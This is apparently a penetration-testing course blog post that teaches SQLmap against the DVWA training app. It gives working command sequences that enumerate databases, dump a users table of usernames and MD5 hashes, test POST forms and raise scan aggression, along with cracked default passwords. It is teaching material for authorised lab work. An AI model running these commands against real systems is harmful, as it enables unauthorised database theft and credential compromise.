🔐

Authorised targets only. All SQLmap commands target DVWA in your own isolated home lab. SQLmap generates high-volume HTTP traffic clearly visible in server logs and IDS. Never run it against systems you don’t own or lack explicit written authorisation to test. Lab: Ethical Hacking Lab Setup.

180-DAY KALI LINUX COURSE
Day 7 / 180 — 3.9%

✅ D1:Nmap
✅ D2:Netcat
✅ D3:Gobuster
✅ D4:Hydra
✅ D5:John
✅ D6:Nikto
▶ D7:SQLmap
D8:Wireshark
D9–180:···

Day 6 (Nikto) flagged a potential SQL injection endpoint. Day 7 teaches you to confirm it and pull every credential, every table, and every piece of data from the database in minutes. SQLmap automates what would take hours of manual UNION payload crafting — and on a confirmed-vulnerable DVWA endpoint, a single three-command sequence goes from zero to a full credential dump in under 90 seconds. Understanding what it is doing beneath the surface is what separates a professional who can adapt when automation fails from one who is lost without it, thats exactly what we will learn today in SQLMAP tutorial

Day 7 covers SQLmap Tutorial completely — installation, basic URL scanning, the full DVWA walkthrough, using Burp Suite request files (the professional method), every important flag, POST form testing, and the command patterns you will use in every authorised web application assessment.

What Is SQLmap & How It Works

SQLmap is an open-source automated SQL injection detection and exploitation tool. It works by sending crafted HTTP requests to a target parameter, analysing the database’s response behaviour to determine whether injection is possible, then systematically extracting the database schema and data using the confirmed injection channel.

It detects five injection types automatically: boolean-based blind (true/false responses differ), time-based blind (delays reveal data bit by bit), error-based (database errors leak data), UNION query (appends SELECT to extract data), and stacked queries (semicolon-separated statement injection). It supports MySQL, PostgreSQL, MSSQL, Oracle, SQLite, and 20+ other database systems.

📚 Manual first, always. The professional workflow is: (1) confirm injection manually with a single quote and a boolean condition in Burp Repeater, (2) use SQLmap for systematic extraction. Manual first prevents false positives. See: SQL Injection Tutorial Step-by-Step and DVWA Day 4: SQL Injection.

Install & Verify SQLmap on Kali Linux

# Pre-installed on Kali Linux — verify:
sqlmap –version
1.8.#stable — https://sqlmap.org

# Update to latest version:
sqlmap –update

# Install if missing:
sudo apt install sqlmap -y

# View all options:
sqlmap -hh # full help (vs -h for short help)

Basic URL Scan — Your First SQLmap Commands

# ─── Basic GET parameter scan ────────────────────────────────────
sqlmap -u “http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” \
       –cookie=“PHPSESSID=abc123; security=low” –batch

# SQLmap tests the ‘id’ parameter and reports injection type found

# ─── List all databases ──────────────────────────────────────────
sqlmap -u “…?id=1&Submit=Submit” –cookie=“…” –dbs –batch

[*] available databases [2]:
[*] dvwa
[*] information_schema

Full DVWA Walkthrough — Zero to Credential Dump

The complete four-command sequence that takes you from detecting an injection to extracting usernames and password hashes. All commands target DVWA in your authorised home lab.

securityelites.com

Kali Linux — SQLmap Full DVWA Extraction (Authorised Home Lab)
# STEP 1: Enumerate databases
└─$ sqlmap -r dvwa_sqli.txt –dbs –batch
[*] dvwa
[*] information_schema
# STEP 2: List tables in dvwa
└─$ sqlmap -r dvwa_sqli.txt -D dvwa –tables –batch
[*] guestbook
[*] users
# STEP 3: Dump users table
└─$ sqlmap -r dvwa_sqli.txt -D dvwa -T users –dump –batch
+—-+——-+———————————-+
| id | user | password (MD5) |
+—-+——-+———————————-+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2 | gordo | e99a18c428cb38d5f260853678922e03 |
| 3 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 |
+—-+——-+———————————-+
→ Crack with John the Ripper (Day 5): admin=password, gordo=abc123, pablo=letmein

SQLmap full DVWA extraction using -r Burp request file — three commands in sequence: –dbs (discover databases), -D dvwa –tables (list tables), -D dvwa -T users –dump (extract all rows). Result: three usernames and MD5 password hashes extracted in under 90 seconds. The hashes feed directly into John the Ripper (Day 5) for offline cracking. This is the complete database compromise path in an authorised lab assessment.
# ─── Complete 4-command extraction sequence ──────────────────────

# 1. Detect injection + enumerate databases
sqlmap -r dvwa_sqli.txt –dbs –batch

# 2. List tables in target database
sqlmap -r dvwa_sqli.txt -D dvwa –tables –batch

# 3. List columns in users table
sqlmap -r dvwa_sqli.txt -D dvwa -T users –columns –batch

# 4. Dump the entire users table
sqlmap -r dvwa_sqli.txt -D dvwa -T users –dump –batch

Burp Suite Request File (-r) — The Professional Method

For complex authenticated requests with POST bodies, multiple cookies, or custom headers — saving the request from Burp and passing it with -r is the most reliable approach. SQLmap reads every header, cookie, and parameter exactly as captured, removing manual specification errors.

# ─── In Burp Suite ────────────────────────────────────────────────
# Proxy → HTTP History → right-click target request
# → Save item → save as dvwa_sqli.txt

# ─── Contents of saved request file ─────────────────────────────
GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.56.101
Cookie: PHPSESSID=abc123; security=low
User-Agent: Mozilla/5.0 …

# ─── Run SQLmap with the file — all headers handled automatically
sqlmap -r dvwa_sqli.txt –dbs –batch
sqlmap -r dvwa_sqli.txt -D dvwa -T users –dump –batch

All Important Flags — Explained

securityelites.com

SQLMAP FLAG REFERENCE — KALI LINUX COURSE DAY 7 — securityelites.com
TARGET FLAGS
-u URL Target URL with parameter
-r file Burp request file (preferred)
-p param Test specific parameter only
–forms Auto-detect & test HTML forms
–data=str POST body string

EXTRACTION FLAGS
–dbs Enumerate all databases
-D name Select database
–tables List tables in database
-T name Select table
–columns List columns in table
–dump Extract all table data
–dump-all Dump entire database

BEHAVIOUR FLAGS
–batch Non-interactive mode
–level=1-5 Test depth (default:1)
–risk=1-3 Payload aggression
–threads=N Concurrent requests
–timeout=N Seconds per request
–cookie=str Session cookie
–proxy=URL Route via Burp

LEVEL & RISK EXPLAINED
level 1 Standard GET/POST params
level 2 + cookies tested
level 3 + HTTP User-Agent header
level 4 + Referer header
level 5 + HTTP Host header
──────────────────────────
risk 1 Safe payloads (default)
risk 2 + heavy time-based
risk 3 + UPDATE statements ⚠️

SQLmap Flag Reference Card — four panels: target flags (-u URL vs -r Burp file — always prefer -r for complex authenticated requests), extraction flags (the –dbs → -D → –tables → -T → –dump chain), behaviour flags (–batch is essential, –level/–risk expand coverage at cost of speed), and level/risk explanation. Risk 3 includes UPDATE payloads — only use on isolated lab targets as it can modify database records.

POST Forms, Authentication & Advanced Scans

# ─── POST form scan ──────────────────────────────────────────────
sqlmap -u “http://192.168.56.101/login.php” \
       –data=“username=admin&password=test” –dbs –batch

# ─── Auto-detect and test all forms on a page ────────────────────
sqlmap -u “http://192.168.56.101/dvwa/” –forms –dbs –batch

# ─── Test specific parameter only ────────────────────────────────
sqlmap -u “http://target.com/search?q=test&page=1” \
       -p q –dbs –batch # only test ‘q’, skip ‘page’

# ─── Thorough scan (slower, more injection types found) ──────────
sqlmap -r request.txt –level=5 –risk=2 –dbs –batch

# ─── Route through Burp (see every request in real time) ─────────
sqlmap -r request.txt –proxy=http://127.0.0.1:8080 –dbs –batch

Reading SQLmap Output — What Each Line Means

# Sample SQLmap output — annotated:
[INFO] testing if GET parameter ‘id’ is dynamic ← checks if param affects response
[INFO] GET parameter ‘id’ appears to be dynamic ← good — varies with input
[INFO] heuristic detects web page charset as ‘UTF-8’
[WARNING] GET parameter ‘id’ does not seem to be injectable ← not injectable

# OR — when injectable:
[INFO] GET parameter ‘id’ is ‘AND boolean-based blind’ injectable
[INFO] GET parameter ‘id’ is ‘MySQL >= 5.0 UNION query’ injectable
[INFO] sqlmap identified the following injection point(s)…

# Results saved to:
/root/.sqlmap/output/192.168.56.101/dump/dvwa/users.csv
# SQLmap saves ALL results automatically — check this folder after every scan

📋 SQLmap Command Reference Card

securityelites.com

SQLMAP REFERENCE CARD — DAY 7 — securityelites.com
FULL EXTRACTION (BURP FILE)
sqlmap -r req.txt –dbs –batch
sqlmap -r req.txt -D db –tables –batch
sqlmap -r req.txt -D db -T tbl –dump –batch

GET URL SCAN
sqlmap -u “URL?id=1” \
  –cookie=“PHPSESSID=abc” \
  –dbs –batch

POST FORM
sqlmap -u “URL” \
  –data=“user=a&pass=b” \
  –dbs –batch

RESULTS LOCATION
/root/.sqlmap/output/
→ [target-ip]/dump/
→ [database]/[table].csv
All dumps auto-saved here

SQLmap Reference Card — Day 7 Kali Linux Course. Four patterns: full extraction using a Burp -r file (the professional standard), GET URL scan with cookie, POST form testing, and results location. SQLmap auto-saves all extracted data to /root/.sqlmap/output/ — always check this folder after every scan. Authorised DVWA lab use only.

Day 7 Complete — 173 Tools Still to Come
180-Day Kali Linux Course — One Tool Per Day. Free.

Frequently Asked Questions – SQLMAP Tutorial

What is SQLmap used for?
Automated SQL injection detection and data extraction in authorised web application penetration tests. Detects five injection types across 20+ database systems. Use after manually confirming a vulnerability exists.
Is SQLmap legal?
Legal on systems you own or have explicit written authorisation to test — DVWA home lab, TryHackMe, HackTheBox, authorised bug bounty targets where automated scanning is in scope. Illegal on any unauthorised system regardless of intent.
Manual SQL injection vs SQLmap — when to use each?
Manual: confirm the vulnerability with quote test and boolean condition. SQLmap: systematic extraction after confirmation. Always manual first — prevents false positives and ensures you understand what you’re exploiting.
How do I use SQLmap with a Burp request file?
Burp → right-click request → Save item → save as request.txt. Then: sqlmap -r request.txt --dbs --batch. All cookies, headers and POST params handled automatically.
What does –batch do?
Makes SQLmap non-interactive — accepts all default answers to prompts automatically. Essential for running scans to completion without monitoring. Always combine with –dbs or –dump.
Most important SQLmap flags?
-r (Burp file), --dbs, -D/-T/--dump (extraction chain), --batch, --level/--risk, --forms, --threads.

ME
Mr Elite
Founder, SecurityElites.com

SQLmap is automation, not magic. The professionals who use it best understand manual SQL injection first — they recognise what SQLmap is doing when it works, and they know what to do manually when it doesn’t. Build the manual understanding from the DVWA SQL Injection series before relying on this tool in a real assessment. Automation accelerates what you already know; it does not replace the knowledge.

Up Next — Day 8
Wireshark — Capture & Analyse Network Traffic
SQLmap extracted the data. Wireshark lets you see exactly how it moved across the network.

Day 8: Wireshark →

RELATED ARTICLESMORE FROM AUTHOR

LEAVE A REPLY

Please enter your comment!
Please enter your name here